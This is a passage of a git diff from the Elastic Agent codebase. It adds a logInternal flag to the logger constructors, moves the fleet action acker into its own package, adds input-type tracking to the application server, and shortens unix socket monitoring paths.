(corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/registry.go b/x-pack/elastic-agent/pkg/composable/registry.go index e9c8c0fb037..fa1acf59b4c 100644 --- a/x-pack/elastic-agent/pkg/composable/registry.go +++ b/x-pack/elastic-agent/pkg/composable/registry.go @@ -21,7 +21,7 @@ type providerRegistry struct { // Providers holds all known providers, they must be added to it to enable them for use var Providers = &providerRegistry{ - contextProviders: make(map[string]ContextProviderBuilder, 0), - dynamicProviders: make(map[string]DynamicProviderBuilder, 0), + contextProviders: make(map[string]ContextProviderBuilder), + dynamicProviders: make(map[string]DynamicProviderBuilder), logger: logp.NewLogger("dynamic"), } diff --git a/x-pack/elastic-agent/pkg/config/operations/inspector.go b/x-pack/elastic-agent/pkg/config/operations/inspector.go index 35164ba649e..15ef586799f 100644 --- a/x-pack/elastic-agent/pkg/config/operations/inspector.go +++ b/x-pack/elastic-agent/pkg/config/operations/inspector.go @@ -8,6 +8,7 @@ import ( "fmt" "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" @@ -18,9 +19,14 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) +var ( + // ErrNoFleetConfig is returned when no configuration was retrieved from fleet just yet. + ErrNoFleetConfig = fmt.Errorf("no fleet config retrieved yet") +) + // LoadFullAgentConfig load agent config based on provided paths and defined capabilities. // In case fleet is used, config from policy action is returned. -func LoadFullAgentConfig(cfgPath string) (*config.Config, error) { +func LoadFullAgentConfig(cfgPath string, failOnFleetMissing bool) (*config.Config, error) { rawConfig, err := loadConfig(cfgPath) if err != nil { return nil, err @@ -39,6 +45,10 @@ func LoadFullAgentConfig(cfgPath string) (*config.Config, error) { if err != nil { return nil, err } else if fleetConfig == nil { + if failOnFleetMissing { + return nil, ErrNoFleetConfig + } + // resolving fleet config but not fleet config retrieved yet, returning last applied config return rawConfig, nil } @@ -73,7 +83,7 @@ func loadConfig(configPath string) (*config.Config, error) { // merge local configuration and configuration persisted from fleet. rawConfig.Merge(config) - if err := InjectAgentConfig(rawConfig); err != nil { + if err := info.InjectAgentConfig(rawConfig); err != nil { return nil, err } @@ -103,5 +113,5 @@ func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { } func newErrorLogger() (*logger.Logger, error) { - return logger.NewWithLogpLevel("", logp.ErrorLevel) + return logger.NewWithLogpLevel("", logp.ErrorLevel, false) } diff --git a/x-pack/elastic-agent/pkg/core/composable/providers.go b/x-pack/elastic-agent/pkg/core/composable/providers.go new file mode 100644 index 00000000000..cbd2e1db4f4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/core/composable/providers.go @@ -0,0 +1,29 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package composable + +import "context" + +// FetchContextProvider is the interface that a context provider uses so as to be able to be called +// explicitely on demand by vars framework in order to fetch specific target values like a k8s secret. +type FetchContextProvider interface { + ContextProvider + // Run runs the inventory provider. + Fetch(string) (string, bool) +} + +// ContextProviderComm is the interface that a context provider uses to communicate back to Elastic Agent. +type ContextProviderComm interface { + context.Context + + // Set sets the current mapping for this context. + Set(map[string]interface{}) error +} + +// ContextProvider is the interface that a context provider must implement. +type ContextProvider interface { + // Run runs the context provider. + Run(ContextProviderComm) error +} diff --git a/x-pack/elastic-agent/pkg/core/logger/logger.go b/x-pack/elastic-agent/pkg/core/logger/logger.go index 6169022fea6..2ef2ce7f16d 100644 --- a/x-pack/elastic-agent/pkg/core/logger/logger.go +++ b/x-pack/elastic-agent/pkg/core/logger/logger.go @@ -30,33 +30,33 @@ type Logger = logp.Logger type Config = logp.Config // New returns a configured ECS Logger -func New(name string) (*Logger, error) { +func New(name string, logInternal bool) (*Logger, error) { defaultCfg := DefaultLoggingConfig() - return new(name, defaultCfg) + return new(name, defaultCfg, logInternal) } // NewWithLogpLevel returns a configured logp Logger with specified level. -func NewWithLogpLevel(name string, level logp.Level) (*Logger, error) { +func NewWithLogpLevel(name string, level logp.Level, logInternal bool) (*Logger, error) { defaultCfg := DefaultLoggingConfig() defaultCfg.Level = level - return new(name, defaultCfg) + return new(name, defaultCfg, logInternal) } // NewFromConfig takes the user configuration and generate the right logger. // TODO: Finish implementation, need support on the library that we use. -func NewFromConfig(name string, cfg *Config) (*Logger, error) { - return new(name, cfg) +func NewFromConfig(name string, cfg *Config, logInternal bool) (*Logger, error) { + return new(name, cfg, logInternal) } -func new(name string, cfg *Config) (*Logger, error) { +func new(name string, cfg *Config, logInternal bool) (*Logger, error) { commonCfg, err := toCommonConfig(cfg) if err != nil { return nil, err } var outputs []zapcore.Core - if cfg.ToFiles { + if logInternal { internal, err := makeInternalFileOutput(cfg) if err != nil { return nil, err diff --git a/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go b/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go index 5944afa4f0c..f2066bf04ec 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go @@ -223,9 +223,7 @@ func monitoringDrop(path string) (drop string) { return "" } - if strings.HasPrefix(path, httpPlusPrefix) { - path = strings.TrimPrefix(path, httpPlusPrefix) - } + path = strings.TrimPrefix(path, httpPlusPrefix) // npipe is virtual without a drop if isNpipe(path) { diff --git a/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go b/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go index 3ece027a7aa..02b0c320d62 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go @@ -5,7 +5,9 @@ package beats import ( + "crypto/sha256" "fmt" + "path/filepath" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" @@ -17,13 +19,9 @@ const ( // args: data path, install path, pipeline name, application name logFileFormatWin = "%s\\logs\\%s\\%s-json.log" - // args: pipeline name, application name - mbEndpointFileFormat = "unix:///tmp/elastic-agent/%s/%s/%s.sock" // args: pipeline name, application name mbEndpointFileFormatWin = `npipe:///%s-%s` - // args: pipeline name, application name - agentMbEndpointFileFormat = "unix:///tmp/elastic-agent/elastic-agent.sock" // args: pipeline name, application name agentMbEndpointFileFormatWin = `npipe:///elastic-agent` ) @@ -35,7 +33,14 @@ func getMonitoringEndpoint(spec program.Spec, operatingSystem, pipelineID string if operatingSystem == "windows" { return fmt.Sprintf(mbEndpointFileFormatWin, pipelineID, spec.Cmd) } - return fmt.Sprintf(mbEndpointFileFormat, pipelineID, spec.Cmd, spec.Cmd) + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), pipelineID, spec.Cmd, spec.Cmd)) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } func getLoggingFile(spec program.Spec, operatingSystem, installPath, pipelineID string) string { @@ -53,7 +58,14 @@ func AgentMonitoringEndpoint(operatingSystem string) string { if operatingSystem == "windows" { return agentMbEndpointFileFormatWin } - return agentMbEndpointFileFormat + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), "elastic-agent")) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } // AgentPrefixedMonitoringEndpoint returns endpoint with exposed metrics for agent. diff --git a/x-pack/elastic-agent/pkg/core/monitoring/monitor.go b/x-pack/elastic-agent/pkg/core/monitoring/monitor.go index 61ebdf3c771..00c7a50003a 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/monitor.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/monitor.go @@ -7,10 +7,8 @@ package monitoring import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/beats" - monitoringConfig "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/config" ) // Monitor is a monitoring interface providing information about the way @@ -30,12 +28,6 @@ type Monitor interface { Close() } -// TODO: changeme -type wrappedConfig struct { - DownloadConfig *artifact.Config `yaml:"agent.download" config:"agent.download"` - MonitoringConfig *monitoringConfig.MonitoringConfig `config:"agent.monitoring" yaml:"agent.monitoring"` -} - // NewMonitor creates a monitor based on a process configuration. func NewMonitor(cfg *configuration.SettingsConfig) (Monitor, error) { return beats.NewMonitor(cfg.DownloadConfig, cfg.MonitoringConfig), nil diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/start.go b/x-pack/elastic-agent/pkg/core/plugin/process/start.go index e177a9882df..2a04bd8b656 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/start.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/start.go @@ -62,6 +62,8 @@ func (a *Application) start(ctx context.Context, t app.Taggable, cfg map[string] if err != nil { return err } + // Set input types from the spec + a.srvState.SetInputTypes(a.desc.Spec().ActionInputTypes) } if a.state.Status != state.Stopped { diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go b/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go index fe20029c94b..8f5f99e4679 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go @@ -21,6 +21,9 @@ func (a *Application) externalProcess(proc *os.Process) { return } + for range time.After(1 * time.Second) { + + } for { select { case <-time.After(1 * time.Second): diff --git a/x-pack/elastic-agent/pkg/core/plugin/service/app.go b/x-pack/elastic-agent/pkg/core/plugin/service/app.go index 97196e0307f..b33561f305f 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/service/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/service/app.go @@ -38,19 +38,17 @@ var ( // Application encapsulates an application that is ran as a service by the system service manager. type Application struct { - bgContext context.Context - id string - name string - pipelineID string - logLevel string - desc *app.Descriptor - srv *server.Server - srvState *server.ApplicationState - limiter *tokenbucket.Bucket - startContext context.Context - tag app.Taggable - state state.State - reporter state.Reporter + bgContext context.Context + id string + name string + pipelineID string + logLevel string + desc *app.Descriptor + srv *server.Server + srvState *server.ApplicationState + limiter *tokenbucket.Bucket + state state.State + reporter state.Reporter uid int gid int diff --git a/x-pack/elastic-agent/pkg/core/server/server.go b/x-pack/elastic-agent/pkg/core/server/server.go index 97517eb6ce6..5dbdb5cd265 100644 --- a/x-pack/elastic-agent/pkg/core/server/server.go +++ b/x-pack/elastic-agent/pkg/core/server/server.go @@ -85,6 +85,8 @@ type ApplicationState struct { actionsConn bool actionsDone chan bool actionsLock sync.RWMutex + + inputTypes map[string]struct{} } // Handler is the used by the server to inform of status changes. @@ -193,6 +195,24 @@ func (s *Server) Get(app interface{}) (*ApplicationState, bool) { return foundState, foundState != nil } +// FindByInputType application by input type +func (s *Server) FindByInputType(inputType string) (*ApplicationState, bool) { + var foundState *ApplicationState + s.apps.Range(func(_ interface{}, val interface{}) bool { + as := val.(*ApplicationState) + if as.inputTypes == nil { + return true + } + + if _, ok := as.inputTypes[inputType]; ok { + foundState = as + return false + } + return true + }) + return foundState, foundState != nil +} + // Register registers a new application to connect to the server. func (s *Server) Register(app interface{}, config string) (*ApplicationState, error) { if _, ok := s.Get(app); ok { @@ -685,6 +705,16 @@ func (as *ApplicationState) SetStatus(status proto.StateObserved_Status, msg str return nil } +// SetInputTypes sets the allowed action input types for this application +func (as *ApplicationState) SetInputTypes(inputTypes []string) { + as.checkinLock.Lock() + as.inputTypes = make(map[string]struct{}) + for _, inputType := range inputTypes { + as.inputTypes[inputType] = struct{}{} + } + as.checkinLock.Unlock() +} + // updateStatus updates the current observed status from the application, sends the expected state back to the // application if the server expects it to be different then its observed state, and alerts the handler on the // server when the application status has changed. diff --git a/x-pack/elastic-agent/pkg/core/server/server_test.go b/x-pack/elastic-agent/pkg/core/server/server_test.go index 755cc0aaad2..b879d53728d 100644 --- a/x-pack/elastic-agent/pkg/core/server/server_test.go +++ b/x-pack/elastic-agent/pkg/core/server/server_test.go @@ -627,7 +627,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } @@ -741,7 +741,7 @@ func (*EchoAction) Name() string { return "echo" } -func (*EchoAction) Execute(request map[string]interface{}) (map[string]interface{}, error) { +func (*EchoAction) Execute(ctx context.Context, request map[string]interface{}) (map[string]interface{}, error) { echoRaw, ok := request["echo"] if !ok { return nil, fmt.Errorf("missing required param of echo") @@ -757,7 +757,7 @@ func (*SleepAction) Name() string { return "sleep" } -func (*SleepAction) Execute(request map[string]interface{}) (map[string]interface{}, error) { +func (*SleepAction) Execute(ctx context.Context, request map[string]interface{}) (map[string]interface{}, error) { sleepRaw, ok := request["sleep"] if !ok { return nil, fmt.Errorf("missing required param of slow") @@ -766,7 +766,15 @@ func (*SleepAction) Execute(request map[string]interface{}) (map[string]interfac if !ok { return nil, fmt.Errorf("sleep param must be a number") } - <-time.After(time.Duration(sleep)) + timer := time.NewTimer(time.Duration(sleep)) + defer timer.Stop() + + select { + case <-ctx.Done(): + return nil, ctx.Err() + case <-timer.C: + } + return map[string]interface{}{}, nil } @@ -777,7 +785,7 @@ func waitFor(check func() error) error { if err == nil { return nil } - if time.Now().Sub(started) >= 5*time.Second { + if time.Since(started) >= 5*time.Second { return fmt.Errorf("check timed out after 5 second: %s", err) } time.Sleep(10 * time.Millisecond) diff --git a/x-pack/elastic-agent/pkg/core/status/reporter_test.go b/x-pack/elastic-agent/pkg/core/status/reporter_test.go index 55fcd3e04fe..bc601155a43 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter_test.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter_test.go @@ -14,7 +14,7 @@ import ( ) func TestReporter(t *testing.T) { - l, _ := logger.New("") + l, _ := logger.New("", false) t.Run("healthy by default", func(t *testing.T) { r := NewController(l) assert.Equal(t, Healthy, r.StatusCode()) diff --git a/x-pack/elastic-agent/pkg/crypto/io.go b/x-pack/elastic-agent/pkg/crypto/io.go index fca7cb6b188..be3751c5be7 100644 --- a/x-pack/elastic-agent/pkg/crypto/io.go +++ b/x-pack/elastic-agent/pkg/crypto/io.go @@ -217,7 +217,6 @@ type Reader struct { err error readHeader bool gcm cipher.AEAD - iv []byte buf []byte eof bool } diff --git a/x-pack/elastic-agent/pkg/crypto/io_test.go b/x-pack/elastic-agent/pkg/crypto/io_test.go index 46847643010..1e3bd24685f 100644 --- a/x-pack/elastic-agent/pkg/crypto/io_test.go +++ b/x-pack/elastic-agent/pkg/crypto/io_test.go @@ -29,7 +29,7 @@ func TestIO(t *testing.T) { require.Equal(t, len(msg), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -56,7 +56,7 @@ func TestIO(t *testing.T) { require.Equal(t, int64(len(msg)), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -81,7 +81,7 @@ func TestIO(t *testing.T) { require.Equal(t, len(msg), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, []byte("bad password")) require.NoError(t, err) @@ -110,7 +110,7 @@ func TestIO(t *testing.T) { require.True(t, len(dest.Bytes()) > 0) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -136,7 +136,7 @@ func TestIO(t *testing.T) { require.True(t, n == 2048) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -151,6 +151,7 @@ func TestIO(t *testing.T) { t.Run("Missing explicit version", func(t *testing.T) { raw, err := randomBytes(2048) + require.NoError(t, err) c := bytes.NewBuffer(raw) r, err := NewReaderWithDefaults(c, []byte("bad password")) @@ -182,7 +183,7 @@ func TestIO(t *testing.T) { require.Equal(t, 19, n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), expected) == -1) + require.False(t, bytes.Contains(dest.Bytes(), expected)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/eql/compare.go b/x-pack/elastic-agent/pkg/eql/compare.go index 9381f254fde..3c7c082f0c1 100644 --- a/x-pack/elastic-agent/pkg/eql/compare.go +++ b/x-pack/elastic-agent/pkg/eql/compare.go @@ -11,8 +11,6 @@ import ( type operand interface{} -type compare func(left, right operand) (bool, error) - func compareEQ(left, right operand) (bool, error) { switch v := left.(type) { case *null: @@ -367,8 +365,6 @@ func compareGTE(left, right operand) (bool, error) { } } -type logical func(left, right operand) (bool, error) - func logicalAND(left, right operand) (bool, error) { switch l := left.(type) { case bool: diff --git a/x-pack/elastic-agent/pkg/eql/expression.go b/x-pack/elastic-agent/pkg/eql/expression.go index eb0d5b08b4b..951074d3142 100644 --- a/x-pack/elastic-agent/pkg/eql/expression.go +++ b/x-pack/elastic-agent/pkg/eql/expression.go @@ -33,7 +33,6 @@ var ( type Expression struct { expression string tree antlr.ParseTree - vars VarStore } // Eval evaluates the expression using a visitor and the provided methods registry, will return true diff --git a/x-pack/elastic-agent/pkg/eql/methods_str.go b/x-pack/elastic-agent/pkg/eql/methods_str.go index b7c49a61036..f32011a9431 100644 --- a/x-pack/elastic-agent/pkg/eql/methods_str.go +++ b/x-pack/elastic-agent/pkg/eql/methods_str.go @@ -84,9 +84,8 @@ func number(args []interface{}) (interface{}, error) { return nil, fmt.Errorf("number: argument 1 must be an integer; recieved %T", args[1]) } } - if strings.HasPrefix(input, "0x") { - input = input[2:] - } + input = strings.TrimPrefix(input, "0x") + n, err := strconv.ParseInt(input, base, 64) if err != nil { return nil, fmt.Errorf("number: failed to convert '%s' to integer", input) diff --git a/x-pack/elastic-agent/pkg/eql/visitor.go b/x-pack/elastic-agent/pkg/eql/visitor.go index f7d6ddffa79..3e7f633daf5 100644 --- a/x-pack/elastic-agent/pkg/eql/visitor.go +++ b/x-pack/elastic-agent/pkg/eql/visitor.go @@ -218,10 +218,7 @@ func (v *expVisitor) VisitExpArithmeticLT(ctx *parser.ExpArithmeticLTContext) in } func (v *expVisitor) VisitBoolean(ctx *parser.BooleanContext) interface{} { - if ctx.TRUE() != nil { - return true - } - return false + return ctx.TRUE() != nil } func (v *expVisitor) VisitArguments(ctx *parser.ArgumentsContext) interface{} { diff --git a/x-pack/elastic-agent/pkg/filewatcher/watcher.go b/x-pack/elastic-agent/pkg/filewatcher/watcher.go index 03619a04135..1961ce1f030 100644 --- a/x-pack/elastic-agent/pkg/filewatcher/watcher.go +++ b/x-pack/elastic-agent/pkg/filewatcher/watcher.go @@ -50,7 +50,7 @@ type Watch struct { func New(log *logger.Logger, f Comparer) (*Watch, error) { var err error if log == nil { - log, err = logger.New("watcher") + log, err = logger.New("watcher", false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go index 5c197289ed9..8767c4ad9b3 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go @@ -12,6 +12,7 @@ import ( "net/http" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const ackPath = "/api/fleet/agents/%s/acks" @@ -25,6 +26,11 @@ type AckEvent struct { AgentID string `json:"agent_id"` // : 'agent1', Message string `json:"message,omitempty"` // : 'hello2', Payload string `json:"payload,omitempty"` // : 'payload2', + + ActionData json.RawMessage `json:"action_data,omitempty"` // copy of original action data + StartedAt string `json:"started_at,omitempty"` // time action started + CompletedAt string `json:"completed_at,omitempty"` // time action completed + Error string `json:"error,omitempty"` // optional action error } // AckRequest consists of multiple actions acked to fleet ui. @@ -58,12 +64,12 @@ func (e *AckResponse) Validate() error { // AckCmd is a fleet API command. type AckCmd struct { - client clienter + client client.Sender info agentInfo } // NewAckCmd creates a new api command. -func NewAckCmd(info agentInfo, client clienter) *AckCmd { +func NewAckCmd(info agentInfo, client client.Sender) *AckCmd { return &AckCmd{ client: client, info: info, @@ -94,7 +100,7 @@ func (e *AckCmd) Execute(ctx context.Context, r *AckRequest) (*AckResponse, erro defer resp.Body.Close() if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } ackResponse := &AckResponse{} diff --git a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go index 1f1bfdb21eb..e384ced92a1 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go @@ -12,6 +12,8 @@ import ( "testing" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) func TestAck(t *testing.T) { @@ -41,11 +43,11 @@ func TestAck(t *testing.T) { id := responses.Events[0].ActionID require.Equal(t, "my-id", id) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { action := &ActionPolicyChange{ ActionID: "my-id", ActionType: "POLICY_CHANGE", diff --git a/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go new file mode 100644 index 00000000000..9cdb54a48bd --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go @@ -0,0 +1,17 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package acker + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Acker is an acker of actions to fleet. +type Acker interface { + Ack(ctx context.Context, action fleetapi.Action) error + Commit(ctx context.Context) error +} diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go similarity index 67% rename from x-pack/elastic-agent/pkg/agent/application/fleet_acker.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go index dac05d0c3a0..cebf49b027f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_acker.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "context" @@ -13,38 +13,42 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/scheduler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const fleetTimeFormat = "2006-01-02T15:04:05.99999-07:00" -type actionAcker struct { - log *logger.Logger - dispatcher dispatcher - client clienter - scheduler scheduler.Scheduler - agentInfo agentInfo - reporter fleetReporter - done chan struct{} +type agentInfo interface { + AgentID() string } -func newActionAcker( +// Acker is acker capable of acking action in fleet. +type Acker struct { + log *logger.Logger + client client.Sender + agentInfo agentInfo +} + +// NewAcker creates a new fleet acker. +func NewAcker( log *logger.Logger, agentInfo agentInfo, - client clienter, -) (*actionAcker, error) { - return &actionAcker{ + client client.Sender, +) (*Acker, error) { + return &Acker{ log: log, client: client, agentInfo: agentInfo, }, nil } -func (f *actionAcker) SetClient(client clienter) { - f.client = client +// SetClient sets client to be used for http communication. +func (f *Acker) SetClient(c client.Sender) { + f.client = c } -func (f *actionAcker) Ack(ctx context.Context, action fleetapi.Action) error { +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { // checkin agentID := f.agentInfo.AgentID() cmd := fleetapi.NewAckCmd(f.agentInfo, f.client) @@ -64,7 +68,8 @@ func (f *actionAcker) Ack(ctx context.Context, action fleetapi.Action) error { return nil } -func (f *actionAcker) AckBatch(ctx context.Context, actions []fleetapi.Action) error { +// AckBatch acknowledges multiple actions at once. +func (f *Acker) AckBatch(ctx context.Context, actions []fleetapi.Action) error { // checkin agentID := f.agentInfo.AgentID() events := make([]fleetapi.AckEvent, 0, len(actions)) @@ -88,12 +93,13 @@ func (f *actionAcker) AckBatch(ctx context.Context, actions []fleetapi.Action) e return nil } -func (f *actionAcker) Commit(ctx context.Context) error { +// Commit commits ack actions. +func (f *Acker) Commit(ctx context.Context) error { return nil } func constructEvent(action fleetapi.Action, agentID string) fleetapi.AckEvent { - return fleetapi.AckEvent{ + ackev := fleetapi.AckEvent{ EventType: "ACTION_RESULT", SubType: "ACKNOWLEDGED", Timestamp: time.Now().Format(fleetTimeFormat), @@ -101,19 +107,12 @@ func constructEvent(action fleetapi.Action, agentID string) fleetapi.AckEvent { AgentID: agentID, Message: fmt.Sprintf("Action '%s' of type '%s' acknowledged.", action.ID(), action.Type()), } -} - -type noopAcker struct{} - -func newNoopAcker() *noopAcker { - return &noopAcker{} -} -func (f *noopAcker) Ack(ctx context.Context, action fleetapi.Action) error { - return nil + if a, ok := action.(*fleetapi.ActionApp); ok { + ackev.ActionData = a.Data + ackev.StartedAt = a.StartedAt + ackev.CompletedAt = a.CompletedAt + ackev.Error = a.Error + } + return ackev } - -func (*noopAcker) Commit(ctx context.Context) error { return nil } - -var _ fleetAcker = &actionAcker{} -var _ fleetAcker = &noopAcker{} diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go similarity index 51% rename from x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go index 41e42df7376..4facc9c63ed 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go @@ -2,14 +2,18 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( + "bytes" "context" "encoding/json" + "fmt" "io" "io/ioutil" "net/http" + "net/url" + "sync" "testing" "github.com/stretchr/testify/assert" @@ -23,10 +27,10 @@ func TestAcker(t *testing.T) { Events []fleetapi.AckEvent `json:"events"` } - log, _ := logger.New("fleet_acker") + log, _ := logger.New("fleet_acker", false) client := newTestingClient() agentInfo := &testAgentInfo{} - acker, err := newActionAcker(log, agentInfo, client) + acker, err := NewAcker(log, agentInfo, client) if err != nil { t.Fatal(err) } @@ -64,3 +68,57 @@ func TestAcker(t *testing.T) { t.Fatal(err) } } + +type clientCallbackFunc func(headers http.Header, body io.Reader) (*http.Response, error) + +type testingClient struct { + sync.Mutex + callback clientCallbackFunc + received chan struct{} +} + +func (t *testingClient) Send( + _ context.Context, + method string, + path string, + params url.Values, + headers http.Header, + body io.Reader, +) (*http.Response, error) { + t.Lock() + defer t.Unlock() + defer func() { t.received <- struct{}{} }() + return t.callback(headers, body) +} + +func (t *testingClient) URI() string { + return "http://localhost" +} + +func (t *testingClient) Answer(fn clientCallbackFunc) <-chan struct{} { + t.Lock() + defer t.Unlock() + t.callback = fn + return t.received +} + +func newTestingClient() *testingClient { + return &testingClient{received: make(chan struct{}, 1)} +} + +type testAgentInfo 